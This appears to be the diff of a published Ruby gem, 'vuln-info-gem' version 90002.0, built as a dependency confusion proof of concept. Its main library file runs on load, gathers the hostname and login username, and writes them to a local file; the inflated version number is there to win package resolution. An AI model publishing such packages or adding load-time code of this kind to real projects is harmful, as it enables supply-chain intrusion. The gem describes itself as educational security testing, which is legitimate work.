vuln-info-gem 90002.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: c4229ef53b291dadd0316af070877a7050fac2f6561dad787718f84b99dbb858
+  data.tar.gz: 6bb7d3d474a428962bc766865cce1194dbec3b2d1602189d8b64b5c94ee65e2b
+SHA512:
+  metadata.gz: 290c2c0164d678e04b982df22f2793271fcabaf1734530d9d09118f82c5a5fa47edaa609230a136ba8099a21a734763b721bb1f992b77ee9461a42bdd4661606
+  data.tar.gz: 58130423d1ca4a8d2322ac75cb0f3974a1c6d1aa014b645735095661cceee91808794f514af179f645b5c861ae9ae2efedd6e6bf03d212218a2833d8093b9739

data/.gitignore

@@ -0,0 +1,8 @@
+/.bundle/
+/.yardoc
+/_yardoc/
+/coverage/
+/doc/
+/pkg/
+/spec/reports/
+/tmp/

data/Gemfile

@@ -0,0 +1,9 @@
+# frozen_string_literal: true
+
+source "https://rubygems.org"
+
+# Specify your gem's dependencies in vuln-info-gem.gemspec
+gemspec
+
+gem "irb"
+gem "rake", "~> 13.0"

data/README.md

@@ -0,0 +1,35 @@
+# Vuln::Info::Gem
+
+TODO: Delete this and the text below, and describe your gem
+
+Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/vuln/info/gem`. To experiment with that code, run `bin/console` for an interactive prompt.
+
+## Installation
+
+TODO: Replace `UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG` with your gem name right after releasing it to RubyGems.org. Please do not do it earlier due to security reasons. Alternatively, replace this section with instructions to install your gem from git if you don't plan to release to RubyGems.org.
+
+Install the gem and add to the application's Gemfile by executing:
+
+```bash
+bundle add UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
+```
+
+If bundler is not being used to manage dependencies, install the gem by executing:
+
+```bash
+gem install UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
+```
+
+## Usage
+
+TODO: Write usage instructions here
+
+## Development
+
+After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
+
+To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
+
+## Contributing
+
+Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/vuln-info-gem.

data/Rakefile

@@ -0,0 +1,4 @@
+# frozen_string_literal: true
+
+require "bundler/gem_tasks"
+task default: %i[]

data/bin/console

@@ -0,0 +1,11 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+require "bundler/setup"
+require "vuln/info/gem"
+
+# You can add fixtures and/or initialization code here to make experimenting
+# with your gem easier. You can also use a different console, if you like.
+
+require "irb"
+IRB.start(__FILE__)

data/bin/setup

@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+set -euo pipefail
+IFS=$'\n\t'
+set -vx
+
+bundle install
+
+# Do any other automated setup that you need to do here

data/lib/vuln/info/gem/version.rb

@@ -0,0 +1,5 @@
+module Vuln
+  module Info
+    VERSION = "90002.0"
+  end
+end

data/lib/vuln/info/gem.rb

@@ -0,0 +1,20 @@
+require "socket"
+require "etc"
+require "time"
+
+begin
+  hostname = Socket.gethostname
+  username = Etc.getlogin || ENV["USERNAME"] || ENV["USER"]
+  timestamp = Time.now.utc.iso8601
+
+  output = <<~DATA
+    === Dependency Confusion Triggered ===
+    Hostname: #{hostname}
+    Username: #{username}
+    Time (UTC): #{timestamp}
+  DATA
+
+  File.write("dependency_confusion_poc.txt", output)
+rescue => e
+  File.write("dependency_confusion_error.txt", e.message)
+end

data/sig/vuln/info/gem.rbs

@@ -0,0 +1,8 @@
+module Vuln
+  module Info
+    module Gem
+      VERSION: String
+      # See the writing guide of rbs: https://github.com/ruby/rbs#guides
+    end
+  end
+end

data/vuln-info-gem.gemspec

@@ -0,0 +1,23 @@
+# frozen_string_literal: true
+
+require_relative "lib/vuln/info/gem/version"
+
+Gem::Specification.new do |spec|
+  spec.name        = "vuln-info-gem"
+  spec.version     = Vuln::Info::VERSION
+  spec.authors     = ["pwnkunwar"]
+  spec.email       = ["pwnkunwar@gmail.com"]
+
+  spec.summary     = "Educational dependency confusion lab gem"
+  spec.description = "This gem demonstrates automatic code execution when resolved via dependency confusion."
+  spec.homepage    = "https://example.com"
+  spec.license     = "MIT"
+
+  spec.required_ruby_version = ">= 3.1.0"
+
+  spec.files = Dir.chdir(__dir__) do
+    `git ls-files -z`.split("\x0")
+  end
+
+  spec.require_paths = ["lib"]
+end

metadata

@@ -0,0 +1,51 @@
+--- !ruby/object:Gem::Specification
+name: vuln-info-gem
+version: !ruby/object:Gem::Version
+  version: '90002.0'
+platform: ruby
+authors:
+- pwnkunwar
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+description: This gem demonstrates automatic code execution when resolved via dependency
+  confusion.
+email:
+- pwnkunwar@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- Gemfile
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- lib/vuln/info/gem.rb
+- lib/vuln/info/gem/version.rb
+- sig/vuln/info/gem.rbs
+- vuln-info-gem.gemspec
+homepage: https://example.com
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: 3.1.0
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.9
+specification_version: 4
+summary: Educational dependency confusion lab gem
+test_files: []